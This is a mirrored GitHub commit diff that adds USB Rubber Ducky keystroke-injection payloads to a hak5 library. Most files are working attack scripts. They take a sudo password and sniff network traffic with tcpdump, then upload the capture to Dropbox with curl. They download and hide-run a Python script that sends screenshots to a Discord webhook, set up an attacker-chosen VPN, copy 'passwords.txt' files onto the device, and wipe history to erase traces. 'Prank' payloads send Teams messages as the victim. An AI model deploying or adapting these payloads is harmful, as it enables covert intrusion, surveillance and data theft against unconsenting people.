hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

pull/277/head
0iphor13 2023-04-25 09:43:51 +02:00 committed by GitHub
parent 406377e308 5d7cee9eba
commit 1f42c9777b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
34 changed files with 1237 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
payloads/library/execution/ExploitingAnExecutableFile/README.md Normal file
View File

@ -0,0 +1,32 @@
# Exploiting An Executable File - Linux ✅
Plug-And-Play ❤️
A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
**Category**: Execution
## Description
A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
**Remember that any execution that is not permitted is not legitimate**.
## Getting Started
### Dependencies
* Linux system
### Executing program
* Plug in your device
### Settings
* You can edit the content that you want to put into the executable file.
```Shell
# You can put whatever you want into the executable file
echo "/bin/sh" > "$file"
```

40
payloads/library/execution/ExploitingAnExecutableFile/payload.txt Normal file
View File

@ -0,0 +1,40 @@
REM ################################################
REM # |
REM # Title : Exploiting An Executable File |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ################################################
REM Requirements:
REM - Nothing, it is Plug-And-Play but you can change it as you want.
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### Script ####
STRINGLN
function search_file {
for file in "$1"/*; do
if [[ -d "$file" ]]; then
search_file "$file";
elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
echo "File Found: $file";
# You can put whatever you want into the executable file
# echo "/bin/sh" > "$file"
fi
done
}
USER=$(whoami);
# You can choose whatever folder you want, the script is recursive.
DIR=/home/$USER/Documents;
search_file "$DIR";
END_STRING
ENTER

19
payloads/library/execution/ExploitingAnExecutableFile/script.sh Normal file
View File

@ -0,0 +1,19 @@
#!/bin/bash
function search_file {
for file in "$1"/*; do
if [[ -d "$file" ]]; then
search_file "$file"
elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
echo "File Found: $file"
# You can put whatever you want into the executable file
# echo "/bin/sh" > "$file"
fi
done
}
USER=$(whoami)
# You can choose whatever folder you want, the script is recursive.
DIR=/home/$USER/Documents
search_file "$DIR"

27
payloads/library/execution/SetArbitraryVPN_Linux/README.md Normal file
View File

@ -0,0 +1,27 @@
# Set Arbitrary VPN - Linux ✅
A script used to set an arbitrary VPN on a Linux machine.
**Category**: Execution
## Description
A script used to set an arbitrary VPN on a Linux machine.
Opens a shell, download the vpn file, set the vpn through openvpn, erase traces.
## Getting Started
### Dependencies
* Permissions
* Internet Connection
* 'openvpn' installed
### Executing program
* Plug in your device
### Settings
* Set the VPN file link

71
payloads/library/execution/SetArbitraryVPN_Linux/payload.txt Normal file
View File

@ -0,0 +1,71 @@
REM ####################################
REM # |
REM # Title : Set Arbitrary VPN |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ####################################
REM Requirements:
REM - Permissions
REM - Internet Connection
REM - 'openvpn' installed
REM REQUIRED: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
DEFINE VPN_FILE_LINK example.com
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
STRING sudo su
ENTER
DELAY 1000
STRING SUDO_PASS
ENTER
DELAY 1000
REM #### VPN SECTION ####
STRING curl
STRING VPN_FILE_LINK
STRING > vpn_configuration.ovpn
ENTER
REM It depends by the internet connection
DELAY 2000
STRING openvpn vpn_configuration.ovpn
REM It depends by the computer power
DELAY 2000
REM #### REMOVE TRACES ####
STRING rm vpn_configuration.ovpn
ENTER
DELAY 500
STRING history -c
ENTER
DELAY 500
REM Exit from Sudo user
STRING exit
ENTER
DELAY 500
REM Close the shell
STRING exit
ENTER

29
payloads/library/exfiltration/Exfiltrate Computer Screenshots/README.md Normal file
View File

@ -0,0 +1,29 @@
# Exfiltrate Computer Screenshots
A script used to prank your friends exfiltrating some screenshots.
**Category**: Exfiltration
## Description
A script used to prank your friends exfiltrating some screenshots.
Open a PowerShell, download the Python script and execute it. The Python script will make some screenshot that will be sent, through the discord webhook, to you.
## Getting Started
### Dependencies
* Internet Connection
* Discord Webhook (or whatever you want for the exfiltration)
* ExecutionPolicy Bypass
* Python
### Executing program
* Plug in your device
### Settings
- Setup your Python script link in the payload.txt file
- Setup your Discord webhook link in the script.py file

39
payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt Normal file
View File

@ -0,0 +1,39 @@
REM ###################################################
REM # |
REM # Title : Exfiltrate Computer Screenshots |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltrate |
REM # Target : Windows 10-11 |
REM # |
REM ###################################################
REM Requirements:
REM - Internet Connection
REM - Discord Webhook (or whatever you want for the exfiltration)
REM - ExecutionPolicy Bypass
REM - Python
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
DELAY 2000
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
DELAY 1000
ALT F4

34
payloads/library/exfiltration/Exfiltrate Computer Screenshots/script.py Normal file
View File

@ -0,0 +1,34 @@
import pyautogui
from time import sleep
import requests
# YOUR DISCORD WEBHOOK
discord_webhook = "https://discord.com/api/webhooks/123456789/xxxxxxxxxx"
# Edit this variables as you want
SCREENSHOTS = 10
TIMING = 5
for i in range(SCREENSHOTS):
sleep(TIMING)
# take the screenshot
screenshot = pyautogui.screenshot()
screenshot.save("screenshot.png")
with open("screenshot.png", "rb") as f:
foto = f.read()
richiesta = {
"username": "ExfiltrateComputerScreenshot"
}
# Send the message by attaching the photo
response = requests.post(discord_webhook, data=richiesta, files={"Screen#"+str(i)+".png": foto})
# Useful for debugging
# if response.status_code == 200:
# print("Photo successfully sent!")
# else:
# print("Error while submitting photo." + str(response.status_code))

27
payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/README.md Normal file
View File

@ -0,0 +1,27 @@
# Exfiltrate Network Traffic - Linux ✅
A script used to exfiltrate the network traffic on a Linux machine.
**Category**: Exfiltrate
## Description
A script used to exfiltrate the network traffic on a Linux machine.
Opens a shell, get the network card name, get the network traffic using tcpdump, send the result to Dropbox, erase traces.
## Getting Started
### Dependencies
* Permissions
* Internet Connection
### Executing program
* Plug in your device
### Settings
* Set the Dropbox token
* Set the sniffing filter

107
payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt Normal file
View File

@ -0,0 +1,107 @@
REM #############################################
REM # |
REM # Title : Exfiltrate Network Traffic |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM #############################################
REM Requirements:
REM - Permissions
REM - Internet Connection
REM REQUIRED: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
REM REQUIRED: Set what you want to sniff, for example tcp port 80
DEFINE SNIFFING example
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
DEFINE TOKEN example
REM Just a Dropbox const
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
REM Output file path packets.pcap, remember to use pcap extension
DEFINE FILE example.pcap
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
STRINGLN sudo su
DELAY 1000
STRINGLN SUDO_PASS
DELAY 1000
REM #### Network Traffic SECTION ####
STRING FILE_PATH="
STRING FILE
STRING "
ENTER
DELAY 500
STRING filter_expression="
STRING SNIFFING
STRING "
ENTER
DELAY 500
REM Network card name
STRINGLN net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
DELAY 500
REM Network dump
STRINGLN tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &
DELAY 500
REM Get PID
STRINGLN tcpdump_pid=$!
REM Set how long you want to sniff
DELAY 60000
REM Kill the process by PID
STRINGLN kill $tcpdump_pid
REM #### Exfiltrate SECTION ####
REM You can use whatever you want, i use Dropbox
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DELAY 500
STRINGLN DROPBOX_FOLDER="/Exfiltration"
DELAY 500
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
ENTER
REM #### REMOVE TRACES ####
STRINGLN rm "$FILE_PATH"
DELAY 500
STRINGLN history -c
DELAY 500
REM Exit from Sudo user
STRINGLN exit
DELAY 500
REM Close the shell
STRINGLN exit

12
payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/script.sh Executable file
View File

@ -0,0 +1,12 @@
#!/bin/bash
filter_expression="tcp port 80"
net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
tcpdump -i "$net_card" $filter_expression -w packets.pcap &
tcpdump_pid=$!
sleep 60
kill $tcpdump_pid

47
payloads/library/exfiltration/Exfiltrate_file_through_GUI_mac/README.md Normal file
View File

@ -0,0 +1,47 @@
# Exfiltrate Files Through GUI - MacOS
Copies files with a certain name to ducky
**Category**: Exfiltration
## Description
A script used to open the finder, look for files with a certain name, then copy them all onto the Ducky
## Getting Started
### Dependencies
* None (That is the beauty of it)
### Executing program
* Plug in your device
### Settings
* Here you can define what files you want the ducky to look for. Note that the more matches there are the longer it will take to copy.
```DuckyScript
DEFINE #target the_filename_you_want.txt
```
* The main `DELAY` points in this script are before tabing 4 times to access the `DUCKY` USB as it is very random how long it takes (in my testing on an m1 pro 3-6 seconds) to show up and the one after the `COMMMAND v` which has to be adjusted depening on how generic the file name looked for it.
Delay for USB to show up:
```DuckyScript
REM This can take annoyingly long to show up which is why the delay is so big
DELAY 6000
REM Go to first result
DO_TABS()
```
Delay for how long the file copying takes:
```DuckyScript
REM Paste the copied files. As this may take a few seconds given on how many results there were there is a long delay
COMMAND v
DELAY 7000
```
https://user-images.githubusercontent.com/69253692/230636177-ca9c5931-44ee-43a2-addc-4ee7f7fb0d62.mov

95
payloads/library/exfiltration/Exfiltrate_file_through_GUI_mac/payload.txt Normal file
View File

@ -0,0 +1,95 @@
REM ###################################################
REM # |
REM # Title : Exfiltrate Files through GUI mac |
REM # Author : Kile |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : MacOS |
REM # |
REM ###################################################
REM NOTE This is not unlikely to fail depending on the speed of search or if a large amount of files meet the criteria. Adjust DELAYs to your needs
ATTACKMODE STORAGE HID VID_05AC PID_021E
DELAY 2000
REM the filename for the payload to look for
DEFINE #target passwords.txt
REM Given that it uses the GUI it is a good idea to enable jitter to be less suspicious
$_JITTER_ENABLED = TRUE
REM This function tabs the amount of times it takes from a finder search to go onto the first file result (4)
FUNCTION DO_TABS()
VAR $COUNTER = 0
WHILE ($COUNTER < 4)
TAB
DELAY 100
$COUNTER = ($COUNTER + 1)
END_WHILE
END_FUNCTION
REM Open finder
COMMAND SPACE
STRINGLN finder
DELAY 500
REM Command n spawns a new window. This makes sure there is only one finder tab (for tabbing to the files later)
COMMAND n
REM Open search bar in finder
COMMAND f
DELAY 200
REM type target filename
STRING #target
DELAY 200
REM This specifies that the passwords.txt has to be a filename and not be in any file
DOWN
ENTER
ENTER
REM Give a bit to find all files
DELAY 500
REM now 4 tabs to get to the first file result
DO_TABS()
REM select all files that have the specified target in their name
COMMAND a
REM Copy the files
COMMAND c
DELAY 500
REM Go back to search window
COMMAND f
DELAY 200
REM Delete previous search
DEL
REM Search for DUCKY USB
STRING DUCKY
DELAY 200
DOWN
ENTER
REM Specifies that the "DUCKY" has to be an external USB drive
STRING Volume
DELAY 200
DOWN
DOWN
DOWN
ENTER
ENTER
REM This can take annoyingly long to show up which is why the delay is so big
DELAY 6000
REM Go to first result
DO_TABS()
REM Open the drive
COMMAND o
DELAY 1000
REM This takes a few seconds
REM Paste the copied files. As this may take a few seconds given on how many results there were there is a long delay
COMMAND v
DELAY 7000
REM Hide
ATTACKMODE OFF

32
payloads/library/prank/Alien Message From Computer/README.md Normal file
View File

@ -0,0 +1,32 @@
# Alien Message From Computer
A script used to prank your friends with a script that simulate an Alien inside the computer.
**Category**: Prank
## Description
A script used to prank your friends with a script that simulate an Alien inside the computer.
Open a PowerShell, download the Python script and execute it. The Python script will simulate the Alien using the Python library pyttsx3.
## Getting Started
### Dependencies
* Internet Connection
* ExecutionPolicy Bypass
* Python
### Executing program
* Plug in your device
### Settings
* Nothing to setup, it is Plug-And-Play
### FAQs
- Why is the code in one line?
- In Python if TAB errors are made then execution is blocked so to avoid writing so many DuckyScript STRING elements I wrote everything in one line separating each command by a semicolon. However, the code can be viewed entirely in the script.py file and edited as desired.

40
payloads/library/prank/Alien Message From Computer/payload.txt Normal file
View File

@ -0,0 +1,40 @@
REM ####################################################
REM # |
REM # Title : Alien Message From Computer |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10/11 |
REM # |
REM ####################################################
REM Plug-And-Play <3
REM Requirements:
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1500
REM Create the file
STRING New-Item -Path ".\script.py" -ItemType "file" -Force
REM Write the code into the file
STRING Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
ENTER
DELAY 1000
REM Execute the Python script
STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
ENTER
REM Close the PowerShell
DELAY 1000
ALT F4

25
payloads/library/prank/Alien Message From Computer/script.py Normal file
View File

@ -0,0 +1,25 @@
import os
from time import sleep
try:
import pyttsx3
except:
os.system("pip install pyttsx3")
import pyttsx3
# How much time you want to wait before speak
sleep(60)
alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'
motore = pyttsx3.init()
# Set alien voice
voce_alienea = motore.getProperty('voices')[1]
motore.setProperty('voice', voce_alienea.id)
# Set the pitch property to make the voice more alien-like
motore.setProperty('pitch', 70)
motore.say(alien_message)
motore.runAndWait()

23
payloads/library/prank/Change Wallpaper With Screenshot/README.md Normal file
View File

@ -0,0 +1,23 @@
# Change Wallpaper With Screenshot
A script used to prank friends by editing their wallpaper with a screenshot making them think that the computer somehow does what it wants. LOL
**Category**: Prank
## Description
A script used to prank friends by editing their wallpaper with a screenshot making them think that the computer somehow does what it wants.
Open a PowerShell, download the Python script and execute it. The Python script will make a screenshot that will be set as wallpaper on the computer where is runned.
## Getting Started
### Dependencies
* Internet Connection
* ExecutionPolicy Bypass
* Python
### Settings
- Setup your Python script link in the payload.txt file

38
payloads/library/prank/Change Wallpaper With Screenshot/payload.txt Normal file
View File

@ -0,0 +1,38 @@
REM ######################################################
REM # |
REM # Title : Change Wallpaper With Screenshot |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ######################################################
REM Requirements:
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
DELAY 2000
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
DELAY 1000
ALT F4

29
payloads/library/prank/Change Wallpaper With Screenshot/script.py Normal file
View File

@ -0,0 +1,29 @@
import os
try:
import pyautogui
except:
os.system("pip install pyautogui")
import pyautogui
from time import sleep
from PIL import Image
import ctypes
# Edit this time as you want...
sleep(30)
screenshot = pyautogui.screenshot()
screenshot.save("screenshot.png")
img = Image.open('screenshot.png')
# Resize the screenshot as the desktop resolution
user32 = ctypes.windll.user32
screensize = user32.GetSystemMetrics(0), user32.GetSystemMetrics(1)
img = img.resize(screensize)
# Set the new wallpaper
image_path = os.path.abspath('screenshot.png')
ctypes.windll.user32.SystemParametersInfoW(20, 0, image_path, 0)

27
payloads/library/prank/PlayASongThroughSpotify_Windows/README.md Normal file
View File

@ -0,0 +1,27 @@
# Play A Song Through Spotify
A script used to prank friends by playing songs through spotify
**Category**: Prank
## Description
A script used to prank friends by playing songs through Spotify. Open a PowerShell, run Spotify, do some TABs for search the song and then play it.
**Some times** popups of advertisements may come out and usually they will click on the search screen, if you want you can uncomment line 42 (and the 43 for a DELAY) so that the popup closes but in case the popup does not click then the rest of the script will not work because escaping it takes it out of its scope.
## Getting Started
### Dependencies
* Internet Connection
* Spotify installed and user logged-in
* ExecutionPolicy Bypass
### Executing program
* Plug in your device
### Settings
- Setup the SONG-NAME that you want to play

57
payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt Normal file
View File

@ -0,0 +1,57 @@
REM ##################################################
REM # |
REM # Title : Play A Song Through Spotify |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ##################################################
REM Requirements:
REM - Internet Connection
REM - Spotify installed and user logged-in
REM - ExecutionPolicy Bypass
REM REQUIRED - Set your song name
DEFINE SONG-NAME example
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRINGLN Start-Process "spotify://"
DELAY 5000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
REM Some times popups of advertisements may come out and usually they will click on the search screen, if you want you can uncomment line 42 so that the popup closes but in case the popup does not click then the rest of the script will not work because escaping it takes it out of its scope.
REM ESCAPE
REM DELAY 500
STRING SONG-NAME
ENTER
DELAY 1000
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
GUI m

24
payloads/library/prank/SendMessagesInTeams/README.md Normal file
View File

@ -0,0 +1,24 @@
# Send Messages In Teams
A script used to prank your friends sending a message through the user Teams.
**Category**: Prank
## Description
A script used to prank your friends sending a message through the user Teams.
Open a PowerShell, stop Teams if is runned, run Teams, run new message function, search the receiver, write and send some messages, then close the app.
## Getting Started
### Dependencies
* Internet Connection
* Microsoft Teams installed and user logged-in
* ExecutionPolicy Bypass
* Python
### Settings
- Setup the receiver

65
payloads/library/prank/SendMessagesInTeams/payload.txt Normal file
View File

@ -0,0 +1,65 @@
REM ###########################################
REM # |
REM # Title : Send Messages In Teams |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ###########################################
REM Requirements:
REM - Microsoft Teams installed and user logged-in
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
REM 1. Open a powershell
REM 2. Close if Teams is opens and reopen it
REM 3. Goto search bar
REM 4. Search the person by name, email, id or what you want...
REM 5. Downarrow and enter to open the chat
REM REQUIRED - Name, email, id or what you want for contact the target
DEFINE USER-ID example
REM REQUIRED - Messages
DEFINE MESSAGE1 example
REM ...
REM DEFINE MESSAGEN example..
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
REM #### Powershell ####
STRINGLN Stop-Process -Name "Teams"
DELAY 1000
STRINGLN Start-Process "$Env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Teams (work or school)"
REM It depends by the computer power
DELAY 10000
REM #### Teams ####
CTRL N
DELAY 2000
STRING USER-ID
ENTER
DELAY 2000
TAB
DELAY 1000
TAB
DELAY 1000
REM #### Messages ####
STRING MESSAGE1
ENTER
DELAY 1000
REM ...
REM STRINGLN MESSAGEN
DELAY 500
ALT F4
DELAY 500
ALT F4

28
payloads/library/prank/Set_VSCode_theme_light/README.md Normal file
View File

@ -0,0 +1,28 @@
# Set VSCode to light theme - MacOS ✅
Plug-And-Play ❤️
A script that sets the VSCode theme to light to let the nightmare of every developer come true!
**Category**: Execution
## Description
A script that opens VSCode, goes to the settings, changes the theme and then sneakily closes the settings again.
## Getting Started
### Dependencies
* MacOS system
* VSCode installed
### Executing program
* Plug in your device
### Settings
*None*
https://user-images.githubusercontent.com/69253692/231779555-bb0e86d1-61ae-4170-809e-0f0723c58445.mov

65
payloads/library/prank/Set_VSCode_theme_light/payload.txt Normal file
View File

@ -0,0 +1,65 @@
REM ################################################
REM # |
REM # Title : Setting VSCode theme to light |
REM # Author : Kile |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : MacOS |
REM # |
REM ################################################
REM DESCRIPTION: Opens VSCode settings and sets it to light mode - beware, eyes may be permanently damaged
ATTACKMODE HID VID_05AC PID_021E
DELAY 500
REM Press the down arrow a lot to select the bottom most theme (which is a light theme)
FUNCTION DO_DOWNS()
VAR $COUNTER = 0
WHILE ($COUNTER < 20)
DOWN
$COUNTER = ($COUNTER + 1)
END_WHILE
END_FUNCTION
REM Open VSCode
COMMAND SPACE
STRING Visual Studio Code
DELAY 200
ENTER
DELAY 300
REM Open settings
COMMAND ,
DELAY 200
REM Look for "theme"
STRING theme
DELAY 200
ENTER
DELAY 200
REM Tab to the first result
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
REM Open the theme dropdown
ENTER
ENTER
DELAY 200
REM Note: There is also a key combinations to open a theme dropdown, however on that dropdown if you press down at the end it will go back up, so you canot be certain what mode is selected.
REM Select light mode
DO_DOWNS()
ENTER
DELAY 100
REM Close the settings window
COMMAND w

69
payloads/library/recon/x-frame-options_scanner/README.md Normal file
View File

@ -0,0 +1,69 @@
# "X-Frame-Options" Scanner
- Title: "X-Frame-Options" Scanner
- Author: TW-D
- Version: 1.0
- Category: Recon
## Description
Uses the "Microsoft Edge" web browser to search for web servers within
a range of IPv4 addresses that do not have an "X-Frame-Options" header.
Then exports the results to a PDF file accessible in the Rubber Ducky.
The results contain the tested IPv4 addresses and the HTML rendering.
## Tested On
>
> Microsoft Edge (Windows 10)
>
| X-Frame-Options | Encryption | Detectable |
| --- | --- | --- |
| None | None | Yes |
| Set to SAMEORIGIN | None | No |
| Set to SAMEORIGIN | Self-Signed Certificate | No |
__NOTE :__ *All cases could not be tested.*
## Configuration
In the "payload.txt" file, replace the values of the following constants :
```
REM ---
REM USB Rubber Ducky label.
REM ---
DEFINE #RD_LABEL DUCKY
REM ---
REM Format of an allowed IPv4 address range.
REM 192.168.0.X-192.168.0.Y where (X < Y)
REM ---
DEFINE #LAN 192.168.0.1-192.168.0.50
```
## Advanced Configuration
In the "main.js" file available in the "recon_files/assets/js/" directory,
you can add new ports to be tested for each host :
```js
if (LAN) {
Promise.all(
[
...,
recon('http', 8080),
recon('https', 8443)
]
);
}
```
## Usage
At the root of the USB Rubber Ducky, copy the "recon_files/" folder.

40
payloads/library/recon/x-frame-options_scanner/payload.txt Normal file
View File

@ -0,0 +1,40 @@
REM TITLE : "X-Frame-Options" Scanner
REM AUTHOR : TW-D
REM TARGET : Microsoft Edge
REM VERSION : 1.0
REM CATEGORY : Recon
REM REQUIREMENT : DuckyScript 3.0
ATTACKMODE HID STORAGE
DELAY 10000
REM ---
REM USB Rubber Ducky label.
REM ---
DEFINE #RD_LABEL DUCKY
REM ---
REM Format of an allowed IPv4 address range.
REM 192.168.0.X-192.168.0.Y where (X < Y)
REM ---
DEFINE #LAN 192.168.0.1-192.168.0.50
SAVE_HOST_KEYBOARD_LOCK_STATE
IF ( $_CAPSLOCK_ON ) THEN
CAPSLOCK
DELAY 500
END_IF
IF ( $_NUMLOCK_ON == FALSE ) THEN
NUMLOCK
DELAY 500
END_IF
GUI r
DELAY 1500
STRINGLN CMD /K "MODE CON:COLS=18 LINES=1 && FOR /F %d IN ('WMIC Volume GET DriveLetter^, Label^|FINDSTR "#RD_LABEL"') DO @SET RD_LABEL=%d"
DELAY 2000
STRINGLN START MSEDGE --headless --disable-gpu --run-all-compositor-stages-before-draw --print-to-pdf="%RD_LABEL%\loot_%RANDOM%.pdf" "%RD_LABEL%\recon_files\index.html?lan=#LAN" && EXIT
RESTORE_HOST_KEYBOARD_LOCK_STATE

25
payloads/library/recon/x-frame-options_scanner/recon_files/assets/css/style.css Normal file
View File

@ -0,0 +1,25 @@
body {
margin: 0;
}
h1, #url {
text-align: center;
}
#url {
font-size: small;
border-width: 1px;
border-style: solid;
border-color: white;
color: whitesmoke;
padding: 1vh 0 1vh 0;
background-color: lightslategray;
}
iframe {
min-width: 100vw;
max-width: 100vw;
min-height: 98vh;
max-height: 98vh;
border-style: none;
}

2
payloads/library/recon/x-frame-options_scanner/recon_files/assets/js/constants.js Normal file
View File

@ -0,0 +1,2 @@
const LAN = (new URLSearchParams(document.location.search).get('lan'));
const OUTPUT = document.querySelector('#output');

15
payloads/library/recon/x-frame-options_scanner/recon_files/assets/js/functions/recon.js Normal file
View File

@ -0,0 +1,15 @@
async function recon(scheme, port) {
for (let target of targets()) {
let url, div, iframe;
url = (scheme + '://' + target + ':' + port + '/');
div = document.createElement('div');
div.id = 'url';
div.innerText = url;
iframe = document.createElement('iframe');
iframe.sandbox = 'allow-same-origin allow-scripts';
iframe.src = url;
OUTPUT.appendChild(div);
OUTPUT.appendChild(iframe);
await sleep();
}
}

7
payloads/library/recon/x-frame-options_scanner/recon_files/assets/js/functions/sleep.js Normal file
View File

@ -0,0 +1,7 @@
function sleep() {
return(
new Promise(
resolve => setTimeout(resolve, 1250)
)
);
}

18
payloads/library/recon/x-frame-options_scanner/recon_files/assets/js/functions/targets.js Normal file
View File

@ -0,0 +1,18 @@
function targets() {
let bounds, wholes, hosts;
bounds = LAN.split('-');
wholes = [bounds[0].split('.'), bounds[1].split('.')];
hosts = [parseInt(wholes[0].pop()), parseInt(wholes[1].pop())];
wholes = [wholes[0].join('.'), wholes[1].join('.')];
if (wholes[0] === wholes[1]) {
let whole, targets;
whole = wholes[0];
targets = new Array();
for (let host = hosts[0]; host <= hosts[1]; host++) {
targets.push(whole + '.' + host);
}
return(targets);
} else {
return(new Array());
}
}

8
payloads/library/recon/x-frame-options_scanner/recon_files/assets/js/main.js Normal file
View File

@ -0,0 +1,8 @@
if (LAN) {
Promise.all(
[
recon('http', 80),
recon('https', 443)
]
);
}

21
payloads/library/recon/x-frame-options_scanner/recon_files/index.html Normal file
View File

@ -0,0 +1,21 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" type="text/css" href="./assets/css/style.css?version=1.0.0" />
</head>
<body>
<main>
<section>
<h1>X-FRAME-OPTIONS Scanner</h1>
<div id="output"></div>
</section>
</main>
<script type="text/javascript" src="./assets/js/constants.js?version=1.0.0"></script>
<script type="text/javascript" src="./assets/js/functions/targets.js?version=1.0.0"></script>
<script type="text/javascript" src="./assets/js/functions/sleep.js?version=1.0.0"></script>
<script type="text/javascript" src="./assets/js/functions/recon.js?version=1.0.0"></script>
<script type="text/javascript" src="./assets/js/main.js?version=1.0.0"></script>
</body>
</html>